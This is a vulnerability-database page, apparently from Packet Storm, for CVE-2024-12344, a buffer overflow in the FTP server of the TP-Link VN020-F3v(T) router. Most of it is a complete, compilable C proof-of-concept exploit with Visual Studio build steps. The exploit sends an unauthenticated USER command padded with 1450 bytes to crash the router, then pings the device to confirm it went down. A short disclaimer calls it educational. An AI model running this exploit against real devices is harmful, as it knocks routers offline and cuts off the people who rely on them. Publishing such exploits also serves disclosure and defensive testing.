📄 TP-Link VN020 F3v(T) TT_V6.2.1021 Buffer Overflow

🗓️ 17 Apr 2025 00:00:00Reported by Mohamed MaatallahType

packetstorm🔗 packetstorm.news👁 202 Views

TP-Link VN020 F3v(T) TT_V6.2.1021 suffers critical buffer overflow affecting FTP server security.

Reporter	Title	Published	Views	Family All 12
GithubExploit	Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Tp-Link Vn020_F3V_Firmware	25 Nov 202421:04	–	githubexploit
Circl	CVE-2024-12344	8 Dec 202423:09	–	circl
CNNVD	TP-LINK VN020 缓冲区错误漏洞	8 Dec 202400:00	–	cnnvd
CNVD	TP-LINK VN020 Buffer Overflow Vulnerability	13 Dec 202400:00	–	cnvd
CVE	CVE-2024-12344	8 Dec 202423:00	–	cve
Cvelist	CVE-2024-12344 TP-Link VN020 F3v(T) FTP USER Command memory corruption	8 Dec 202423:00	–	cvelist
Exploit DB	TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption	17 Apr 202500:00	–	exploitdb
EUVD	EUVD-2024-50789	3 Oct 202520:07	–	euvd
NVD	CVE-2024-12344	8 Dec 202423:15	–	nvd
Positive Technologies	PT-2024-9320 · Tp Link · Tp-Link Vn020 F3V	8 Dec 202400:00	–	ptsecurity

* Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption
    * Date: 11/24/2024
    * Exploit Author: Mohamed Maatallah
    * Vendor Homepage: https://www.tp-link.com
    * Version: TT_V6.2.1021 (VN020-F3v(T))
    * Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
    * CVE: CVE-2024-12344
    * Category: Remote
    
    * Description:
    * A critical buffer overflow and memory corruption vulnerability was discovered in TP-Link VN020-F3v(T) router's FTP server implementation. The vulnerability stems from improper input validation of the USER command, allowing unauthenticated attackers to trigger various failure modes through payload size manipulation:
    
    * 1. 1100 bytes - Delayed crash (5-10 seconds)
    * 2. 1450 bytes - Immediate crash
    * 3. >1450 bytes - Undefined behavior/state corruption
    
    * Proof of Concept: (attached full c file)
     * Compilation Instructions (Visual Studio):
     * ---------------------------------------
     * 1. Open Visual Studio
     * 2. Create a new C Console Application
     * 3. Add these additional dependencies to project settings:
     *    - ws2_32.lib
     *    - iphlpapi.lib
     * 4. Ensure Windows SDK is installed
     * 5. Set Platform Toolset to latest v143 or v142
     * 6. Compile in Release or Debug mode
     *
     * Disclaimer:
     * ----------
     * This proof of concept is for educational and research purposes only.
     * Unauthorized testing without explicit permission is unethical and illegal.
     */
    
    #define _CRT_SECURE_NO_WARNINGS
    #include <stdio.h>
    #include <stdlib.h>
    #include <winsock2.h>
    #include <ws2tcpip.h>
    #include <stdint.h>
    #include <windows.h>
    #include <iphlpapi.h>
    #include <icmpapi.h>
    
    #pragma comment(lib, "ws2_32.lib")
    #pragma comment(lib, "iphlpapi.lib")
    
     // Target configuration - MODIFY BEFORE TESTING
    #define DEST_IP "192.168.1.1"     // IP of target FTP server
    #define DEST_PORT 21               // Standard FTP port
    #define PING_TIMEOUT_MS 1000       // Network timeout
    #define MAX_PING_RETRIES 5         // Connectivity check attempts
    
    // 1450: Instant
    // 1100: Delayed
    #define CRASH_STRING_LENGTH 1450   // Exact number of 'A's triggering instantcrash
    #define TOTAL_PAYLOAD_LENGTH (CRASH_STRING_LENGTH + 5 + 2)  // USER + As + \r\n
    
    typedef struct {
        HANDLE icmp_handle;
        IPAddr target_addr;
        LPVOID reply_buffer;
        DWORD reply_size;
    } ping_context_t;
    
    void log_msg(const char* prefix, const char* msg) {
        SYSTEMTIME st;
        GetLocalTime(&st);
        printf("[%02d:%02d:%02d] %s %s\n", st.wHour, st.wMinute, st.wSecond, prefix, msg);
    }
    
    void hexdump(const char* desc, const void* addr, const int len) {
        int i;
        unsigned char buff[17];
        const unsigned char* pc = (const unsigned char*)addr;
    
        if (desc != NULL)
            printf("%s:\n", desc);
    
        for (i = 0; i < len; i++) {
            if ((i % 16) == 0) {
                if (i != 0)
                    printf("  %s\n", buff);
                printf("  %04x ", i);
            }
    
            printf(" %02x", pc[i]);
    
            if ((pc[i] < 0x20) || (pc[i] > 0x7e))
                buff[i % 16] = '.';
            else
                buff[i % 16] = pc[i];
            buff[(i % 16) + 1] = '\0';
        }
    
        while ((i % 16) != 0) {
            printf("   ");
            i++;
        }
    
        printf("  %s\n", buff);
    }
    
    BOOL check_connectivity(ping_context_t* ctx) {
        char send_buf[32] = { 0 };
        return IcmpSendEcho(ctx->icmp_handle, ctx->target_addr, send_buf, sizeof(send_buf),
            NULL, ctx->reply_buffer, ctx->reply_size, PING_TIMEOUT_MS) > 0;
    }
    
    char* generate_exact_crash_payload() {
        char* payload = (char*)malloc(TOTAL_PAYLOAD_LENGTH + 1);  // +1 for null terminator
        if (!payload) {
            log_msg("[-]", "Failed to allocate payload memory");
            return NULL;
        }
    
        // Construct the exact payload that causes crash
        strcpy(payload, "USER ");                            // 5 bytes
        memset(payload + 5, 'A', CRASH_STRING_LENGTH);      // 1450 'A's
        memcpy(payload + 5 + CRASH_STRING_LENGTH, "\r\n", 2); // 2 bytes
        payload[TOTAL_PAYLOAD_LENGTH] = '\0';
    
        char debug_msg[100];
        snprintf(debug_msg, sizeof(debug_msg), "Generated payload of length %d ('A's + 5 byte prefix + 2 byte suffix)",
            TOTAL_PAYLOAD_LENGTH);
        log_msg("[*]", debug_msg);
    
        return payload;
    }
    
    BOOL send_crash_payload(const char* target_ip, uint16_t target_port) {
        WSADATA wsa;
        SOCKET sock = INVALID_SOCKET;
        struct sockaddr_in server;
        char server_reply[2048];
        int recv_size;
        ping_context_t ping_ctx = { 0 };
        BOOL success = FALSE;
    
        // Initialize Winsock
        if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
            log_msg("[-]", "Winsock initialization failed");
            return FALSE;
        }
    
        // Setup ICMP for connectivity monitoring
        ping_ctx.icmp_handle = IcmpCreateFile();
        ping_ctx.reply_size = sizeof(ICMP_ECHO_REPLY) + 32;
        ping_ctx.reply_buffer = malloc(ping_ctx.reply_size);
        inet_pton(AF_INET, target_ip, &ping_ctx.target_addr);
    
        // Create socket
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if (sock == INVALID_SOCKET) {
            log_msg("[-]", "Socket creation failed");
            goto cleanup;
        }
    
        // Setup server address
        server.sin_family = AF_INET;
        server.sin_port = htons(target_port);
        inet_pton(AF_INET, target_ip, &server.sin_addr);
    
        // Connect to FTP server
        log_msg("[*]", "Connecting to target FTP server...");
        if (connect(sock, (struct sockaddr*)&server, sizeof(server)) < 0) {
            log_msg("[-]", "Connection failed");
            goto cleanup;
        }
        log_msg("[+]", "Connected successfully");
    
        // Verify initial connectivity
        if (!check_connectivity(&ping_ctx)) {
            log_msg("[-]", "No initial connectivity to target");
            goto cleanup;
        }
    
        // Receive banner
        if ((recv_size = recv(sock, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR) {
            log_msg("[-]", "Failed to receive banner");
            goto cleanup;
        }
        server_reply[recv_size] = '\0';
        log_msg("[*]", server_reply);
    
        // Generate and send the exact crash payload
        char* payload = generate_exact_crash_payload();
        if (!payload) {
            goto cleanup;
        }
    
        log_msg("[*]", "Sending crash payload...");
        hexdump("Payload hex dump (first 32 bytes)", payload, 32);
    
        if (send(sock, payload, TOTAL_PAYLOAD_LENGTH, 0) < 0) {
            log_msg("[-]", "Failed to send payload");
            free(payload);
            goto cleanup;
        }
        free(payload);
        log_msg("[+]", "Payload sent successfully");
    
        // Monitor for crash
        log_msg("[*]", "Monitoring target status...");
        Sleep(1000);  // Wait a bit for crash to take effect
    
        int failed_pings = 0;
        for (int i = 0; i < MAX_PING_RETRIES; i++) {
            if (!check_connectivity(&ping_ctx)) {
                failed_pings++;
                if (failed_pings >= 3) {
                    log_msg("[+]", "Target crash confirmed!");
                    success = TRUE;
                    goto cleanup;
                }
            }
            Sleep(500);
        }
    
        log_msg("[-]", "Target appears to still be responsive");
    
    cleanup:
        if (sock != INVALID_SOCKET) {
            closesocket(sock);
        }
        if (ping_ctx.icmp_handle != INVALID_HANDLE_VALUE) {
            IcmpCloseHandle(ping_ctx.icmp_handle);
        }
        if (ping_ctx.reply_buffer) {
            free(ping_ctx.reply_buffer);
        }
        WSACleanup();
        return success;
    }
    
    int main(void) {
        printf("\nTP-Link VN020 FTP Memory Corruption PoC\n");
        printf("---------------------------------------\n");
        printf("Target: %s:%d\n", DEST_IP, DEST_PORT);
        if (send_crash_payload(DEST_IP, DEST_PORT)) {
            printf("\nExploit successful - target crashed\n");
        }
        else {
            printf("\nExploit failed - target may be patched\n");
        }
    
        return 0;
    }

17 Apr 2025 00:00Current

7.2High risk

Vulners AI Score7.2

CVSS 3.16.3 - 9.8

CVSS 45.3

CVSS 26.5

CVSS 36.3

EPSS0.007

SSVC